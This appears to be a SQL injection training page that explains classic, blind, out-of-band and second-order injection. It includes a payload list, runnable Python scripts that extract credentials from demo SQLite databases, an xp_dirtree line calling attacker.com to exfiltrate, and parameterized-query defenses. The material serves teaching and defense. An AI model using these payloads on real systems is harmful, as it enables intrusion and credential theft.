SQL Injection Playground

Learn. Exploit. Defend.

🎮 Interactive SQL Injection Simulator

Try these payloads in our safe demo environment to see how SQL injection works in action!

Login Form Simulator

Type a payload into the username field and click "Login": the simulator shows the SQL query the server would build from your input, so you can see exactly where your text lands inside the statement.

📚 SQL Injection Types Explained

1. Classic SQL Injection

The OG attack that started it all. When user input gets directly concatenated into SQL queries.

SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything'

The -- starts a comment, so the rest of the query (including the password check) is ignored and the row for admin is returned. Dialect caveat: MySQL only treats -- as a comment when a space follows it, so payloads there are written as admin'-- (with a trailing space) or admin'# instead.

2. Blind SQLi (The Sneaky One)

When you don't get direct output but can infer information based on behavior.

Boolean-based: admin' AND 1=1-- vs admin' AND 1=2-- (the page looks different depending on whether the injected condition is true, which turns the endpoint into a yes/no oracle)

Time-based: admin'; IF (1=1) WAITFOR DELAY '0:0:5'-- (MSSQL syntax; the response is delayed only when the condition is true. The equivalents are SLEEP(5) on MySQL and pg_sleep(5) on PostgreSQL)
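The boolean-based technique, and the char-by-char extraction that Challenge 3 below asks for, as a runnable script. This is an added example, not code from the original page: it uses Python's sqlite3 module against a constructed in-memory users table, a hypothetical page_shows_welcome() endpoint that only reveals whether a row matched, and a binary search over the character codes so each character costs about seven requests instead of up to 95.

```python
import sqlite3

# Constructed demo database: the admin password below is invented for this example.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'Pa55word')")
conn.commit()


def page_shows_welcome(username):
    """Simulated vulnerable endpoint (hypothetical). The attacker sees only whether
    the page says 'welcome' (a row matched) or not: no data, no error text."""
    query = "SELECT 1 FROM users WHERE username = '" + username + "'"
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # errors are hidden from the client, as a real app would do


def oracle(condition):
    """Turn the endpoint into a yes/no oracle with: admin' AND (<condition>)--"""
    return page_shows_welcome("admin' AND (" + condition + ")--")


def binary_search(gt_template, lo, hi):
    """Find the integer in [lo, hi] by asking 'is the value > mid?' questions.
    gt_template is a SQL condition with {v} where the probe value goes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(gt_template.format(v=mid)):
            lo = mid + 1  # value is above mid
        else:
            hi = mid      # value is mid or below
    return lo


def extract_password(max_len=64):
    """Recover the admin password one character at a time (Challenge 3)."""
    length = binary_search("LENGTH(password) > {v}", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # UNICODE(SUBSTR(...)) is SQLite; MySQL and MSSQL use ASCII(SUBSTRING(...)).
        # 32..126 covers printable ASCII; widen the range for other character sets.
        code = binary_search(f"UNICODE(SUBSTR(password, {pos}, 1)) > {{v}}", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    print(extract_password())
```

Each oracle() call is one HTTP request in practice, which is why rate limiting and monitoring for bursts of near-identical requests are listed under defenses: a 20-character password costs roughly 150 requests with this search, and tens of thousands if you probe each character linearly.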

3. Out-of-Band SQLi (The Fancy One)

When you make the database call out to external systems to exfiltrate data.

'; EXEC master..xp_dirtree '\\attacker.com\share'--

This makes the database server try to open a UNC path on a host you control, so you see a DNS lookup or SMB connection attempt coming from the database even when the web app shows nothing. xp_dirtree is MSSQL-specific, and the database account needs permission to run it.

4. Second-Order SQLi (The Patient One)

When your payload is stored harmlessly (for example through a parameterized INSERT) and only becomes active later, when another function reads the stored value back and concatenates it into a different query, trusting it because "it came from the database".

Example:

// Registration stores the username safely as data (parameterized), payload and all:
INSERT INTO users (username, password) VALUES (?, ?)      // username = admin'--

// Later, the password-change feature trusts the stored username and concatenates it:
UPDATE users SET password = 'newpass' WHERE username = 'admin'--'

// The -- swallows the closing quote, so the admin's password is changed, not the attacker's... boom!
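The second-order chain end to end, as an added example (not code from the original page) using Python's sqlite3 module and a constructed users table. register() is correctly parameterized; change_password_unsafe() is the hypothetical later function that trusts the stored username, and change_password_safe() is the fix:

```python
import sqlite3

# Constructed demo database (example data, not from the page).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
conn.commit()


def register(username, password):
    """First order is SAFE: the payload is stored verbatim as data via placeholders."""
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 (username, password))
    conn.commit()


def change_password_unsafe(session_username, new_password):
    """VULNERABLE second order: the username comes back from the database/session,
    is assumed 'already validated', and is concatenated into a new query."""
    query = ("UPDATE users SET password = '" + new_password +
             "' WHERE username = '" + session_username + "'")
    conn.execute(query)
    conn.commit()


def change_password_safe(session_username, new_password):
    """FIX: data read back from storage is still untrusted; bind it like any input."""
    conn.execute("UPDATE users SET password = ? WHERE username = ?",
                 (new_password, session_username))
    conn.commit()


def password_of(username):
    return conn.execute("SELECT password FROM users WHERE username = ?",
                        (username,)).fetchone()[0]


def attack_scenario():
    """Run the chain once and report (admin's password, attacker's password)."""
    register("admin'--", "whatever")              # accepted: it is just a string
    change_password_unsafe("admin'--", "pwned")   # attacker 'changes their own password'
    return password_of("admin"), password_of("admin'--")


if __name__ == "__main__":
    print(attack_scenario())  # the admin's password changed, the attacker's did not
```

The point to take away for code review: "it came from our own database" is not a trust boundary. Any value that is concatenated into SQL is an injection point, whatever its origin.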

🔍 Identifying Vulnerable Endpoints

During Testing:

  1. Error Probing: Look for SQL errors when sending special characters (', ", ;)
  2. Boolean Tests: Try ' AND 1=1-- vs ' AND 1=2-- and compare responses
  3. Time Delays: '; WAITFOR DELAY '0:0:5'-- to test for blind SQLi (MSSQL syntax; the equivalents are SLEEP(5) on MySQL and pg_sleep(5) on PostgreSQL)
  4. UNION Attacks: Find the column count with ' ORDER BY X--, incrementing X until the database errors; the last X that worked is the column count

During Code Review:

# UNSAFE - Direct string concatenation (VULNERABLE)
# A quote in username changes the structure of the query, not just its data.
query = "SELECT * FROM users WHERE username = '" + username + "'"

# SAFE - Parameterized queries (SECURE)
# %s is the DB-API placeholder (psycopg2, MySQLdb); sqlite3 uses ? instead.
# The value travels separately from the SQL text, so it can never become SQL.
# Never write query % username or an f-string here: that is concatenation in disguise.
query = "SELECT * FROM users WHERE username = %s"
cursor.execute(query, (username,))
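The same contrast as a runnable script, covering the classic admin'-- attack from the first section and the code-review pattern above. This is an added example, not code from the original page: it uses Python's sqlite3 module against a constructed in-memory users table (sqlite3's placeholder is ? rather than %s), and built_query() shows the text the simulator at the top of the page would display:

```python
import sqlite3

# Constructed in-memory demo database (example data, not from the page).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                 [("admin", "S3cret!"), ("alice", "hunter2")])
conn.commit()


def built_query(username, password):
    """The SQL text the unsafe version actually runs (what the simulator displays)."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_unsafe(username, password):
    """VULNERABLE: input is concatenated straight into the SQL text, so a quote in
    the input changes the structure of the query. Returns the logged-in username."""
    row = conn.execute(built_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(username, password):
    """SAFE: placeholders (? in sqlite3, %s in psycopg2/MySQLdb). The driver sends the
    values separately from the SQL text, so admin'-- is looked up literally as a name."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for payload in ("admin'--", "' OR '1'='1'--"):
        print(built_query(payload, "anything"))
        print("  unsafe ->", login_unsafe(payload, "anything"),
              "| safe ->", login_safe(payload, "anything"))
```

Note that ' OR '1'='1'-- logs you in as whichever row the database returns first, which is why it so often lands on the admin account created during setup.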

Red Flags in Code:

  • SQL text built with +, f-strings, %, .format(), sprintf or template literals from anything that came from a request
  • Raw query functions that take a single string (execute("..."), mysqli_query, Statement.executeQuery) with a variable inside that string
  • ORM escape hatches (raw(), extra(), whereRaw, createNativeQuery) with interpolated input
  • Table names, column names, ORDER BY or LIMIT clauses assembled from parameters: these cannot be bound, so they need an allowlist
  • Hand-rolled "escaping" (addslashes, replacing quotes) used instead of parameters
  • Values read from the database, a session or a file treated as trusted because "they are already ours" (second-order)

🧠 Payload Crafting Guide

Structure Your Attack:

  1. Break Out: Close the current context (', ", ))
  2. Inject: Add your malicious SQL (OR 1=1, UNION SELECT, etc.)
  3. Comment Out: Neutralize the rest (--, #, /*)

Pro Tips:

  • Comment syntax is dialect-specific: -- (needs a trailing space in MySQL), # (MySQL only), /* */ (everywhere)
  • Work out the context you land in first: a numeric context (WHERE id = 5) needs no quote to break out, a string context does
  • When you cannot comment out the tail of the query, close it instead: ' OR 'a'='a
  • In UNION payloads match the column count exactly and use NULL in positions whose type you do not know yet

Common Payloads:

Authentication Bypass: ' OR '1'='1'-- (matches every row; the app usually logs you in as the first user returned)
Database Version: ' UNION SELECT 1,version(),3-- (MySQL/PostgreSQL; @@version on MSSQL, sqlite_version() on SQLite)
Table Names: ' UNION SELECT 1,table_name,3 FROM information_schema.tables--
Column Names: ' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--
Data Exfiltration: ' UNION SELECT 1,username||':'||password,3 FROM users-- (|| works in PostgreSQL, Oracle and SQLite; MySQL uses CONCAT(username,':',password))

The 1 and 3 are fillers: their count must match the column count found with ORDER BY, and the data you want has to sit in a column the page actually renders.
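The whole UNION workflow from the "During Testing" steps and the payloads above, as an added example that is not code from the original page. It runs against a constructed SQLite database with a hypothetical three-column product search: first the ORDER BY probe finds the column count from the error, then UNION SELECT pulls the version, the table list, the users table definition and the credentials. SQLite has no information_schema, so sqlite_master stands in for information_schema.tables and information_schema.columns here:

```python
import sqlite3

# Constructed demo database with a 3-column products table and a users table.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER, name TEXT, price REAL);
INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 'S3cret!'), ('alice', 'hunter2');
""")


def search_unsafe(term):
    """VULNERABLE (hypothetical) product search; database errors propagate to the caller."""
    query = "SELECT id, name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(query).fetchall()


def find_column_count(max_cols=20):
    """Step 4 of 'During Testing': ORDER BY n succeeds up to the column count, then errors."""
    for n in range(1, max_cols + 1):
        try:
            search_unsafe(f"' ORDER BY {n}--")
        except sqlite3.OperationalError:  # e.g. 'ORDER BY term out of range'
            return n - 1
    return None


def union_extract(expression, from_clause=""):
    """Inject a UNION SELECT with the right column count (3 here). The 'zzz' prefix
    makes the original query match nothing, so every row returned is ours, and the
    interesting value sits in column 2 (the one the page renders as the product name)."""
    payload = f"zzz' UNION SELECT 1, {expression}, 3 {from_clause}--"
    return sorted(row[1] for row in search_unsafe(payload))


if __name__ == "__main__":
    print("columns:", find_column_count())
    print("version:", union_extract("sqlite_version()"))
    print("tables:", union_extract("name", "FROM sqlite_master WHERE type = 'table'"))
    print("users DDL:", union_extract("sql", "FROM sqlite_master WHERE name = 'users'"))
    print("creds:", union_extract("username || ':' || password", "FROM users"))
```

Because search_unsafe() lets the OperationalError reach the caller, the column-count probe works on the first try; an application that swallows errors forces you back to the boolean or time-based probes, which is exactly why "no DB errors to the client" is on the defense checklist.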

🛡️ Defense Mechanisms

SQL Injection Defense Checklist

  • Use prepared statements (parameterized queries) for every value that comes from outside the application
  • Implement proper error handling (no DB errors to the client; they turn blind SQLi into easy error-based SQLi)
  • Apply least privilege DB accounts (no xp_cmdshell or FILE privilege, read-only where the feature allows it)
  • Use WAFs as a secondary defense only, never as the fix
  • Regular security testing and code reviews
  • Input validation (allowlist approach), especially for identifiers such as table, column and ORDER BY names, which cannot be parameterized
  • Use ORMs with built-in protection, and treat their raw-query escape hatches as raw SQL
  • Implement rate limiting (blind extraction needs hundreds to thousands of near-identical requests)

Secure Coding Examples:

Java (JDBC):

// UNSAFE
String query = "SELECT * FROM users WHERE username = '" + username + "'";
Statement stmt = connection.createStatement();
ResultSet rs = stmt.executeQuery(query);

// SAFE
String query = "SELECT * FROM users WHERE username = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, username);
ResultSet rs = pstmt.executeQuery();

PHP:

// UNSAFE
$query = "SELECT * FROM users WHERE username = '" . $_GET['username'] . "'";
$result = mysqli_query($conn, $query);

// SAFE
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ?");
$stmt->bind_param("s", $_GET['username']);
$stmt->execute();
$result = $stmt->get_result();
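Python (dynamic identifiers), as an added example that is not code from the original page. Prepared statements cover values, but a sort column chosen by the user cannot be bound as a parameter, so the checklist's allowlist item is the defense here. The script uses Python's sqlite3 module with a constructed users table and a hypothetical list_users endpoint; blind_probe_via_order_by() shows what an attacker does with the unsafe version (the sort order itself becomes a boolean oracle), and list_users_safe() shows the fix:

```python
import sqlite3

# Constructed demo table; sorting by 'username' and by 'created' give different orders on purpose.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (username TEXT, password TEXT, created INTEGER);
INSERT INTO users VALUES ('bob', 'pw1', 1), ('admin', 'S3cret!', 2), ('alice', 'pw2', 3);
""")

ALLOWED_SORT_COLUMNS = {"username", "created"}   # deliberately not 'password'
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def list_users_unsafe(sort_by):
    """VULNERABLE: a column name cannot be a bound parameter, so it is concatenated
    with no check. Any SQL expression is accepted as the sort key."""
    rows = conn.execute("SELECT username FROM users ORDER BY " + sort_by)
    return [r[0] for r in rows]


def list_users_safe(sort_by, direction="ASC"):
    """SAFE: only identifiers from a fixed allowlist ever reach the query text."""
    if sort_by not in ALLOWED_SORT_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("invalid sort parameter")
    rows = conn.execute(f"SELECT username FROM users ORDER BY {sort_by} {direction}")
    return [r[0] for r in rows]


def blind_probe_via_order_by(condition):
    """Attacker's view of the unsafe endpoint: when the injected condition is true the
    rows come back sorted by username, otherwise by created, so the order leaks one bit."""
    expr = f"(CASE WHEN ({condition}) THEN username ELSE created END)"
    return list_users_unsafe(expr) == list_users_unsafe("username")


def is_rejected(sort_by):
    """True when the safe endpoint refuses the parameter before building any SQL."""
    try:
        list_users_safe(sort_by)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    admin_pw = "(SELECT password FROM users WHERE username = 'admin')"
    print(blind_probe_via_order_by(f"{admin_pw} LIKE 'S%'"))   # True: leaks first char
    print(blind_probe_via_order_by(f"{admin_pw} LIKE 'X%'"))   # False
    print(is_rejected("password"), is_rejected("username; DROP TABLE users"))
```

The allowlist is a set of literal column names, not a regex or a denylist of keywords: the moment you try to "clean" an identifier instead of choosing it from a fixed list, you are back to escaping.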

🏆 Challenge Area

Test your SQL injection skills with these progressive challenges:

Challenge 1: Basic Login Bypass

Bypass the login form without knowing valid credentials.

Challenge 2: Database Schema Extraction

Find the column count, then extract the database version and the table names using a UNION attack.

Challenge 3: Blind Data Exfiltration

Extract the admin password one character at a time using boolean responses.

🎉 Congratulations!

You've completed all challenges! Here's your badge:

SQL Master Badge

You're now a certified SQL Injection Ninja!